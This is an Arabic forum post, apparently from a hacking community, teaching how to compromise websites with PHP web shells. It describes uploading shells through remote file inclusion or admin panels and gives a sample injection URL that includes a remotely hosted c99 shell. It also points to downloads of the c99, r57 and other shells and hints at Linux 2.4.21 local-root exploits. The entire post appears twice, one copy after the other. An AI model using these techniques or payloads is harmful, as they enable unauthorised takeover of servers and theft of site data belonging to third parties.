تويت
ملاحظه أقصد هنا الشل هو السكربت الخاص باختراق المواقع وليس الشل الخاص باوامر اللينكس .
الشل عبارة عن سكربت مكتوب باحد لغات البرمجه بالغالب تكون php وقد تكون غيرها
وظيفة الشل :
يقوم الشل بعد رفعه للموقع بالتحكم الكامل بالسيرفر (طبعا على حسب حماية السيرفر و الموقع )
حيث من خلاله تستطيع قراءة وتعديل جميع الملفات على المواقع و احيانا على السيرفر(حسب حماية السيرفر والموقع )
وتعديل التصاريح والاتصال بقواعد البيانات وحتى الاتصال العكسي بالسيرفر لاخذ ro0t اي المدير على السيرفر
وللشل وظائف عديده جدا ويختلف من شل الى شل بالخصائص و الميزات
أنصحك لتعرف عن الشل ان تجربه على جهازك بعد تركيب سيرفر شخصي لتعرف قوة السيرفر وماذا يفعل بالموقع
و السيرفر .
كيفيت رفع الشل :
للشل طريقتان للرفع :
الاولى عن طريق ثغرات الفايل أنكلود .
الثانيه عن طريق لوحات التحكم التي تسمح لك برفع الشل.
ما هي ثغرات فايل انلكود:
لا اريد ان طيل عليكم وشرح لغة php لكي تفهما رغم اني انصح من يريد تعلم الهكر تعلم php
ببساطه هي ثغرات تمكنك من ربط الشل الخاص بك الذي من المفتراض ان يكون رافعه على احد المواقع المجانيه
بصفحه التي فيها ثغرة عن طريق متغير في الصفحه
مثال بسيط للتوضيح فقط
لنفترض ان الموق الذي وجد فيه ثغرت فايل انكلود هو
google.com
حيث الصفحه التي فيها المتغير هي مثلا
google.com/er.php
و المتغير الذي نستطيع ربط الشل به هو
skaka
مثلا
تكون الصفحه هكذا
google.com/er.php?skaka
لا حظ علامة الاستفهام يجب ان توضع
لان نربط الشل الخاص الذي من المفترض ان يكون هكذا
skaka.jeeran.com/c99.txt
لاحظ المتداد txt
الان نربط الشل بلصفحه وتكون هكذا
google.com/er.php?skaka=http://skaka.jeeran.com/c99.txt?
لاحظ علامة الاستفهام في الاخير (يجب ان تكون علامة الاستفهام في اخر اليمين لاكن الانه المنتدى ذو واجهه عربي)
'طبعا هذا الشرح لتوضيح فقط ثغرات الفايل انكلود
اما الطريقه الثانيه في لا تحتاج شرح فقط أرفع الشل بصيغة php من خلال لوحة التحكم السكربت الذي وجد فيه ثغرة
هذا الشل قناص السعودي للمبدع متكى وراء الشمس
للتحميل
هذا الشل مضمون بإذن الله
=============
هذا شل الروسي c99 بالعربي
للتحميل
وهذا الشل العملاق r57.php
للتحميل
لا اظمن سلامة الملفات هذي r57.php و ملف c99
لانها مشفره
رغم اني استخدم الاثنين
وهاذا شل جاهز ومرفوع علي موقع لتطبيق
سيد القرش الغامض!!
وعلي فكره
الي يبي ياخذ روت
2.4.21-27
2-4-21
اللوكال روت
الشل عبارة عن سكربت مكتوب باحد لغات البرمجه بالغالب تكون php وقد تكون غيرها
وظيفة الشل :
يقوم الشل بعد رفعه للموقع بالتحكم الكامل بالسيرفر (طبعا على حسب حماية السيرفر و الموقع )
حيث من خلاله تستطيع قراءة وتعديل جميع الملفات على المواقع و احيانا على السيرفر(حسب حماية السيرفر والموقع )
وتعديل التصاريح والاتصال بقواعد البيانات وحتى الاتصال العكسي بالسيرفر لاخذ ro0t اي المدير على السيرفر
وللشل وظائف عديده جدا ويختلف من شل الى شل بالخصائص و الميزات
أنصحك لتعرف عن الشل ان تجربه على جهازك بعد تركيب سيرفر شخصي لتعرف قوة السيرفر وماذا يفعل بالموقع
و السيرفر .
كيفيت رفع الشل :
للشل طريقتان للرفع :
الاولى عن طريق ثغرات الفايل أنكلود .
الثانيه عن طريق لوحات التحكم التي تسمح لك برفع الشل.
ما هي ثغرات فايل انلكود:
لا اريد ان طيل عليكم وشرح لغة php لكي تفهما رغم اني انصح من يريد تعلم الهكر تعلم php
ببساطه هي ثغرات تمكنك من ربط الشل الخاص بك الذي من المفتراض ان يكون رافعه على احد المواقع المجانيه
بصفحه التي فيها ثغرة عن طريق متغير في الصفحه
مثال بسيط للتوضيح فقط
لنفترض ان الموق الذي وجد فيه ثغرت فايل انكلود هو
google.com
حيث الصفحه التي فيها المتغير هي مثلا
google.com/er.php
و المتغير الذي نستطيع ربط الشل به هو
skaka
مثلا
تكون الصفحه هكذا
google.com/er.php?skaka
لا حظ علامة الاستفهام يجب ان توضع
لان نربط الشل الخاص الذي من المفترض ان يكون هكذا
skaka.jeeran.com/c99.txt
لاحظ المتداد txt
الان نربط الشل بلصفحه وتكون هكذا
google.com/er.php?skaka=http://skaka.jeeran.com/c99.txt?
لاحظ علامة الاستفهام في الاخير (يجب ان تكون علامة الاستفهام في اخر اليمين لاكن الانه المنتدى ذو واجهه عربي)
'طبعا هذا الشرح لتوضيح فقط ثغرات الفايل انكلود
اما الطريقه الثانيه في لا تحتاج شرح فقط أرفع الشل بصيغة php من خلال لوحة التحكم السكربت الذي وجد فيه ثغرة
هذا الشل قناص السعودي للمبدع متكى وراء الشمس
للتحميل
هذا الشل مضمون بإذن الله
=============
هذا شل الروسي c99 بالعربي
للتحميل
وهذا الشل العملاق r57.php
للتحميل
لا اظمن سلامة الملفات هذي r57.php و ملف c99
لانها مشفره
رغم اني استخدم الاثنين
وهاذا شل جاهز ومرفوع علي موقع لتطبيق
سيد القرش الغامض!!
وعلي فكره
الي يبي ياخذ روت
2.4.21-27
2-4-21
اللوكال روت
تعليق